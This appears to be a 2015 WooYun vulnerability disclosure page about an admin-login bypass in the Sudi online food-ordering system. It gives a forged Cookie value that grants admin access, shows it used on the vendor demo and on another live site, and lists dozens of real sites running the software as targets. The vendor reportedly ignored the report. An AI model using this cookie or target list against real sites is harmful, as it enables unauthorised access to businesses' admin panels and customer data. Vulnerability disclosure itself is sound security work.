速递网上订餐系统后台任意登陆 | wooyun-2015-0106449| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106449

漏洞标题：速递网上订餐系统后台任意登陆

漏洞作者： Ch丶0nly

提交时间：2015-04-08 14:32

修复时间：2015-05-23 14:34

公开时间：2015-05-23 14:34

漏洞类型：非授权访问/权限绕过

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-08：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-05-23：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

速递订餐系统专业从事网上订餐系统研究开发。主要产品包括：速递网上订餐系统，速递电话订餐系统,手机订餐系统等。速递订餐系统有很多个的成功案例，总结出各个行业成功经验，并将其融入到技术和产品当中。

漏洞证明：

专业项目： 1、订餐系统开发 2、行业管理软件 3、网站建设
官方网站：http://www.dc135.cn
该系统存在后台绕过漏洞由于设计不当构造Cookie可登陆任意网站
直接拿官网演示站证明
漏洞演示：http://s.dc135.cn/admin/login.aspx （默认后台地址为admin）
来到后台登陆页面，把我们的
Cookie修改成：admin_name=YCTubJNynzOIw9pfy+JPyA==; 150407150609196=77xOl1M5qBkoIFclY57nZ3xTX9VDshuRB5r3kyyEPmxz4YACu/NwxKSC4R9C42Eeqfn/T3y8lFA6AmNP9h0DCQ==

然后访问后台首页：http://s.dc135.cn/admin/index.aspx

成功登陆后台
http://www.wo1818.cn/admin/login.aspx
修改Cookie为：admin_name=YCTubJNynzOIw9pfy+JPyA==; 150407150609196=77xOl1M5qBkoIFclY57nZ3xTX9VDshuRB5r3kyyEPmxz4YACu/NwxKSC4R9C42Eeqfn/T3y8lFA6AmNP9h0DCQ==
访问后台首页
http://www.wo1818.cn/admin/index.aspx

附大量案例：
http://s.dc135.cn
http://p.dc135.cn
http://www.56769999.com
http://www.wo1818.cn
http://www.zdsha.com
http://www.huiguoxian.com
http://www.1688.cd
http://www.longheruijia.net
http://www.shanghailecheng.com
http://www.nianhuoshao.net
http://www.xhb.so
http://www.kuaieke.com
http://www.dsxyyc.net
http://www.yxlkc.com
http://www.efood51.com
http://www.ichifan.cn
http://www.ycttkc.net
http://www.0993chi.com
http://5haochi.gotoip4.com
http://www.51wwwcom.com
http://www.fszjf.net
http://www.youshidao.com
http://www.z8dian.com
http://www.beijingguijie.com
http://dc.yydh.net
http://www.yppks.com
http://www.517970.com
http://www.12d.in
http://www.agankc.com
http://www.yigi.com
http://www.52wswm.com
http://www.baiweida.cn
http://www.dx2168.com
http://www.jshaoji.com
http://www.aishangkc.com
http://www.zibenjia.cc
http://www.4000129329.com
http://www.jiashihui.net
http://www.2hd610.com
http://www.junhuilai.com
http://www.wm119.com
http://www.xn--mtss0p.cn
http://www.qihefan.com
http://www.15lida.com
http://www.juhuicom.com
http://www.yijiakc.com
http://www.kuaidian.biz
http://www.gmtg33.com
http://www.xn--lwr591aunl.com
http://www.yxlzc.com
http://www.fzjjs.com
http://www.365waimai.com
http://www.youcan114.com
http://www.91waimai.com
http://www.tondong.com
http://www.zzqmkc.com
http://www.umke.cn
http://www.chinesefooddeli.com
dc135135.39.cvod.net
http://www.whwmwang.com
http://www.websongcan.com
http://www.qhmw.net
http://www.wsdcw.com
http://sd-shop.cn
http://www.xiangmiwu.com
http://www.est517.com
http://www.75fan.com
http://www.51wsd.com
http://www.51haoziwei.com
http://www.hnyehuo.com
http://www.026978.com
http://www.jingyuanbuy.com
http://www.chiwoba.cn
http://www.meiweisong.com
http://www.sanqigame.com

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106449

漏洞标题：速递网上订餐系统后台任意登陆

相关厂商：速递网上订餐系统

漏洞作者： Ch丶0nly

提交时间：2015-04-08 14:32

修复时间：2015-05-23 14:34

公开时间：2015-05-23 14:34

漏洞类型：非授权访问/权限绕过

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Ch丶0nly@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106449

漏洞标题：速递网上订餐系统后台任意登陆

相关厂商：速递网上订餐系统

漏洞作者： Ch丶0nly

提交时间：2015-04-08 14:32

修复时间：2015-05-23 14:34

公开时间：2015-05-23 14:34

漏洞类型：非授权访问/权限绕过

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0106449"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Ch丶0nly@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：